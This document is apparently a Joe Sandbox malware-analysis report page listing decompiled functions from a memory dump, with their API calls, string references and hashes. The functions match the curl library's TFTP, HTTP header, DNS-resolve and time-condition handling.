Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: sendto$ErrorLast$_time64
String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
API String ID: 251675022-4197595102
Opcode ID: 7ce6048a5e3d92de6ace709e8b7e9eafcd073ef33f1777cd89a68624e9e123b3
Instruction ID: 028e9834f611cbfa05a2dc871f2b75a49403caeaec3b76a8ff6c42a1c96f5fde
Opcode Fuzzy Hash: 7ce6048a5e3d92de6ace709e8b7e9eafcd073ef33f1777cd89a68624e9e123b3
Instruction Fuzzy Hash: 9DA19072A08681C2EB11DF39D4406A8B7A0FF88F89F844132DE5D4B798DF39D449E7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1965C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 190COMMON

Download Yara Rule

APIs

inet_pton.WS2_32 ref: 00007FF7F8D197C1
inet_pton.WS2_32 ref: 00007FF7F8D197F6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D19780

Part of subcall function 00007FF7F8D19168: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FF7F8D19212,?,?,?,?,00000000,?,?,00007FF7F8D19449,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19185

Part of subcall function 00007FF7F8D03018: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D03055

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D198A3

Part of subcall function 00007FF7F8D2E620: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D23498,?,?,?,00007FF7F8D237B6,?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D2E64B
Part of subcall function 00007FF7F8D2E620: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D23498,?,?,?,00007FF7F8D237B6,?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D2E661
Part of subcall function 00007FF7F8D2E620: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D23498,?,?,?,00007FF7F8D237B6,?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D2E67A

Strings

Couldn't parse CURLOPT_RESOLVE entry '%s'!, xrefs: 00007FF7F8D197A2
%255[^:]:%d, xrefs: 00007FF7F8D196C2
Address in '%s' found illegal!, xrefs: 00007FF7F8D19813
Couldn't parse CURLOPT_RESOLVE removal entry '%s'!, xrefs: 00007FF7F8D196D3
%s:%d, xrefs: 00007FF7F8D196F3, 00007FF7F8D19828
Added %s:%d:%s to DNS cache, xrefs: 00007FF7F8D19907
%255[^:]:%d:%255s, xrefs: 00007FF7F8D1978C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$inet_pton$__stdio_common_vsscanftolower
String ID: %255[^:]:%d$%255[^:]:%d:%255s$%s:%d$Added %s:%d:%s to DNS cache$Address in '%s' found illegal!$Couldn't parse CURLOPT_RESOLVE entry '%s'!$Couldn't parse CURLOPT_RESOLVE removal entry '%s'!
API String ID: 4215584051-312647877
Opcode ID: 2af8d53b83bddfcc075963b934ee2a28eaa495eee29905eadc009cf18fa4f31a
Instruction ID: 898042160acce3f368c206d81ab270de325c40ad7ed188f17b9e9766a31f736a
Opcode Fuzzy Hash: 2af8d53b83bddfcc075963b934ee2a28eaa495eee29905eadc009cf18fa4f31a
Instruction Fuzzy Hash: 4A81A121A0DA46A1FB54AB61D4183B9E350FF49BA8FC41132D92D07AC5DF7CE40EE3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D35E3C Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 169COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D35F09
__swprintf_l.LIBCMT ref: 00007FF7F8D35F4C
__swprintf_l.LIBCMT ref: 00007FF7F8D3602E

Strings

Given file does not exist, xrefs: 00007FF7F8D35E9B
Skipping time comparison, xrefs: 00007FF7F8D360C0
%04d%02d%02d%02d%02d%02d, xrefs: 00007FF7F8D35EE4
%04d%02d%02d %02d:%02d:%02d GMT, xrefs: 00007FF7F8D35F13
The requested document is not new enough, xrefs: 00007FF7F8D36089
Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 00007FF7F8D36027
unsupported MDTM reply format, xrefs: 00007FF7F8D35E8A
The requested document is not old enough, xrefs: 00007FF7F8D360B7

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l$_time64
String ID: %04d%02d%02d %02d:%02d:%02d GMT$%04d%02d%02d%02d%02d%02d$Given file does not exist$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$unsupported MDTM reply format
API String ID: 2514911627-226030088
Opcode ID: 4f9e3f73b947e671f8310d557baf93f74143cfabee6b96b52e105c9b33bce88f
Instruction ID: 9c2001577f30cc214be4b5ac180aef85a592d2aaf452814b60ff4e9f562c0c06
Opcode Fuzzy Hash: 4f9e3f73b947e671f8310d557baf93f74143cfabee6b96b52e105c9b33bce88f
Instruction Fuzzy Hash: 9E81A572608B4186FB10DB24E4406AAF3A0FF88754F944132EA6D477D8DF7CE408EB94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2D9B9 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 310COMMON

Download Yara Rule

Strings

HTTP error before end of send, keep sending, xrefs: 00007FF7F8D2DB5C
Keep sending data to get tossed away!, xrefs: 00007FF7F8D2DBC4
Content-Length:, xrefs: 00007FF7F8D2D11C
no chunk, no close, no size. Assume close to signal end, xrefs: 00007FF7F8D2D9EC
HTTP 1.0, assume close after body, xrefs: 00007FF7F8D2D04C
HTTP/%1d.%1d%c%3d, xrefs: 00007FF7F8D2CE92
HTTP/2 %d, xrefs: 00007FF7F8D2CEB5
Lying server, not serving HTTP/2, xrefs: 00007FF7F8D2CF0D
Connection closure while negotiating auth (HTTP 1.0?), xrefs: 00007FF7F8D2DA39

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Connection closure while negotiating auth (HTTP 1.0?)$Content-Length:$HTTP 1.0, assume close after body$HTTP error before end of send, keep sending$Keep sending data to get tossed away!$Lying server, not serving HTTP/2$no chunk, no close, no size. Assume close to signal end
API String ID: 0-3305901948
Opcode ID: c5cd187ffcc3af157f39b31296a456bd382633f5083d1299da49dd6485f2859d
Instruction ID: 5efdc2f91413ea879f1698db4e5df2a18f75408d4e261181fda634c912b4691b
Opcode Fuzzy Hash: c5cd187ffcc3af157f39b31296a456bd382633f5083d1299da49dd6485f2859d
Instruction Fuzzy Hash: C7E19172A0868686EB68EB3495407BAF7A0FF09750F804135C779832D1DF3CE459E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D38478 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 270stringCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D384F9
strchr.LIBVCRUNTIME ref: 00007FF7F8D38553
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3860F
strchr.LIBVCRUNTIME ref: 00007FF7F8D38677
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3887C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D388B1

Strings

Uploading to a URL without a file name!, xrefs: 00007FF7F8D386DF
no memory, xrefs: 00007FF7F8D38690
Request has same path as previous transfer, xrefs: 00007FF7F8D38886

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$callocfreereallocstrncmp
String ID: Request has same path as previous transfer$Uploading to a URL without a file name!$no memory
API String ID: 425831019-2111548750
Opcode ID: 80daac59f8ca92fa118a95de044cdb50cbc06663b1a9f6a85e2ee34f832b41aa
Instruction ID: 07c514185129e1958d017ef9e5da5e71b20dd3cf3a96b8309ec66ca3281de80a
Opcode Fuzzy Hash: 80daac59f8ca92fa118a95de044cdb50cbc06663b1a9f6a85e2ee34f832b41aa
Instruction Fuzzy Hash: 3DC1B162B0968285EB61AF25E4003B8E7A1FF4C788F884131CA6D077D5DF3DE549E798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2D5DB Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 233stringCOMMON

Download Yara Rule

APIs

isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2D5E3
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2D5FE
strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D2D611

Strings

Content-Length:, xrefs: 00007FF7F8D2D11C
HTTP 1.0, assume close after body, xrefs: 00007FF7F8D2D04C
*, xrefs: 00007FF7F8D2D5ED
HTTP/%1d.%1d%c%3d, xrefs: 00007FF7F8D2CE92
HTTP/2 %d, xrefs: 00007FF7F8D2CEB5
Lying server, not serving HTTP/2, xrefs: 00007FF7F8D2CF0D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isdigit$strtoll
String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$*$Content-Length:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2
API String ID: 1861613328-2566406286
Opcode ID: 96a6353c6a4c8853427061b31271766c075b274dfb65f4f7e4bb88fd55a527fe
Instruction ID: 52e2c56fbd6298a277c978cc850f61ce93f692762250d9ce3d2279c355555f6a
Opcode Fuzzy Hash: 96a6353c6a4c8853427061b31271766c075b274dfb65f4f7e4bb88fd55a527fe
Instruction Fuzzy Hash: 7AB18232A0868A86EB64EB34D5406B9F7A0FF09740F944135C76D836D1DF3CE469E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0DE50 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0DEA1
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0DED2
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D0DEF5
__swprintf_l.LIBCMT ref: 00007FF7F8D0DF77
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0DFEB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0E039
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0E051
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0E073

Strings

internal error: invalid pattern type (%d), xrefs: 00007FF7F8D0E05A
%0*lu, xrefs: 00007FF7F8D0DF61

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$__acrt_iob_func__swprintf_lisdigitmallocreallocstrtoul
String ID: %0*lu$internal error: invalid pattern type (%d)
API String ID: 2583327680-449433499
Opcode ID: ecfa5e0a059e389e4e897713cc00195ec912a4709ba26166db22909ef0071ff6
Instruction ID: bdba8a718e127bc3a340f77e81cd85a79c566de05880833fdf7e66565d48d189
Opcode Fuzzy Hash: ecfa5e0a059e389e4e897713cc00195ec912a4709ba26166db22909ef0071ff6
Instruction Fuzzy Hash: 5B61E522B0969186FB10EB61945027DEBA1BF08BA4F944236CE7E477C8CF3DD449D364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D31BA8 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 174networkCOMMON

Download Yara Rule

APIs

sendto.WS2_32 ref: 00007FF7F8D31CE9
sendto.WS2_32 ref: 00007FF7F8D31D5D
sendto.WS2_32 ref: 00007FF7F8D31E14
WSAGetLastError.WS2_32(?,?,?,?,?,00007FF7F8D316AD), ref: 00007FF7F8D31E1E
_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,00007FF7F8D316AD), ref: 00007FF7F8D31E6C

Strings

tftp_rx: internal error, xrefs: 00007FF7F8D31BF1
Received last DATA packet block %d again., xrefs: 00007FF7F8D31DA8
Timeout waiting for block %d ACK. Retries = %d, xrefs: 00007FF7F8D31C22
Received unexpected DATA packet block %d, expecting block %d, xrefs: 00007FF7F8D31E74

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: sendto$ErrorLast_time64
String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
API String ID: 3931062552-1785996722
Opcode ID: 34f93355d8cc0b69f4b970b539c697f63924f867a5804110df025238e13daa21
Instruction ID: aac22e3a48717df1f146df548a5d9e7eb93bd5f5847b1810af5b49b85d686f6c
Opcode Fuzzy Hash: 34f93355d8cc0b69f4b970b539c697f63924f867a5804110df025238e13daa21
Instruction Fuzzy Hash: 02816172608782C5DB11DF29D4402A9BBA0FB8CF88F988136DE5C4B798DF39D409E764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2AE90 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D2AF51
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2AF72
strchr.LIBVCRUNTIME ref: 00007FF7F8D2B052
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2B06B

Strings

Transfer-Encoding:, xrefs: 00007FF7F8D2B032
Connection, xrefs: 00007FF7F8D2B00F
Host:, xrefs: 00007FF7F8D2AF9B
Content-Length, xrefs: 00007FF7F8D2AFE8
Content-Type:, xrefs: 00007FF7F8D2AFC1
%s, xrefs: 00007FF7F8D2B090

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isspacestrchr
String ID: %s$Connection$Content-Length$Content-Type:$Host:$Transfer-Encoding:
API String ID: 2446454806-3301244629
Opcode ID: c93511ca31ae1e178e181e653e9882967fd7a79f334b15c84d92c36a20aa74c1
Instruction ID: 32e68fce8f21d3451fafc511bb9adb201c12b9d28d6fa25b0d160074217844b6
Opcode Fuzzy Hash: c93511ca31ae1e178e181e653e9882967fd7a79f334b15c84d92c36a20aa74c1
Instruction Fuzzy Hash: 8B61D661A0D68381FB66AB219500779E390EF4DB94F88407ADA7C473C1DF6CE44DE3A9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D28470 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 104COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D28615

Strings

%4I64dT, xrefs: 00007FF7F8D285DF
%4I64dG, xrefs: 00007FF7F8D285A6
%4I64dM, xrefs: 00007FF7F8D2850E
%4I64dP, xrefs: 00007FF7F8D285FC
%2I64d.%0I64dG, xrefs: 00007FF7F8D2853E
%4I64dk, xrefs: 00007FF7F8D2849D
%2I64d.%0I64dM, xrefs: 00007FF7F8D284C5
%5I64d, xrefs: 00007FF7F8D28485

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l
String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
API String ID: 1488884202-2102732564
Opcode ID: bc8a0fb54b90ac0f7bfe28168100d6f44448ef39f7776423ce8e3178b32d9967
Instruction ID: 00e1cc682044e68aa8b8f43110821d95fdca7ed8434fd3618e777dc67275ae36
Opcode Fuzzy Hash: bc8a0fb54b90ac0f7bfe28168100d6f44448ef39f7776423ce8e3178b32d9967
Instruction Fuzzy Hash: 4D31A290F4A24B43EF18979A9C10BF4D2515F5ABA4FC44333D93E0FBC5D92CB14A66A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1F1E8 Relevance: 16.7, APIs: 10, Strings: 1, Instructions: 192stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D1F22D
strchr.LIBVCRUNTIME ref: 00007FF7F8D1F254
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F309
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F344
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F373
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F394
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F3AB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F3EE
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F430
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F46D

Strings

CURLOPT_WRITEDATA, xrefs: 00007FF7F8D1F200

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc$strchr
String ID: CURLOPT_WRITEDATA
API String ID: 1280369219-1930637452
Opcode ID: 38ace2010ba47248945e977e3c3acff1b9855e0be08fb6d6534053a01ba8a616
Instruction ID: f4e2a9e087b0f7c1f2ce4f4c3fafbae6741b14ecb8b3bb10a2b7bf6b00cc7f22
Opcode Fuzzy Hash: 38ace2010ba47248945e977e3c3acff1b9855e0be08fb6d6534053a01ba8a616
Instruction Fuzzy Hash: 59717D2670EF8681EB61AF22B544279E654BF4CBD4F8C0031DD6E47794DE3CE409A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D47FBC Relevance: 16.7, APIs: 11, Instructions: 187COMMON

Download Yara Rule

APIs

isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D4800E
isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D48085
isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D480FB
isalpha.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D4810D
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D4811C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isprint$isalnumisalphaisdigit
String ID:
API String ID: 2067569585-0
Opcode ID: a3de9253c7231e816c75b2c98e02c393835685f05326b9624b908d9d58a4d418
Instruction ID: 9cd5f2168a7cd32a6b7a4bcb067f14163f2bef9f4391e84785d0fda124ea7ccd
Opcode Fuzzy Hash: a3de9253c7231e816c75b2c98e02c393835685f05326b9624b908d9d58a4d418
Instruction Fuzzy Hash: 19719111F1D58686FB75BB20945027DE691AF4D380F8C00B6D6AF476C5DE1CA88DB3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0E790 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 405stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E831
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E84B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E8A1
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E8BE
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E94E

Strings

%s== Info: %s, xrefs: 00007FF7F8D0E7A1
I32, xrefs: 00007FF7F8D0E827, 00007FF7F8D0E892
I64, xrefs: 00007FF7F8D0E841, 00007FF7F8D0E8B4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strncmp$strtol
String ID: %s== Info: %s$I32$I64
API String ID: 1111410017-2208011497
Opcode ID: c04096f948adebf976991a9805ec52ce8d304ac47a3911ad3e4d168357decd78
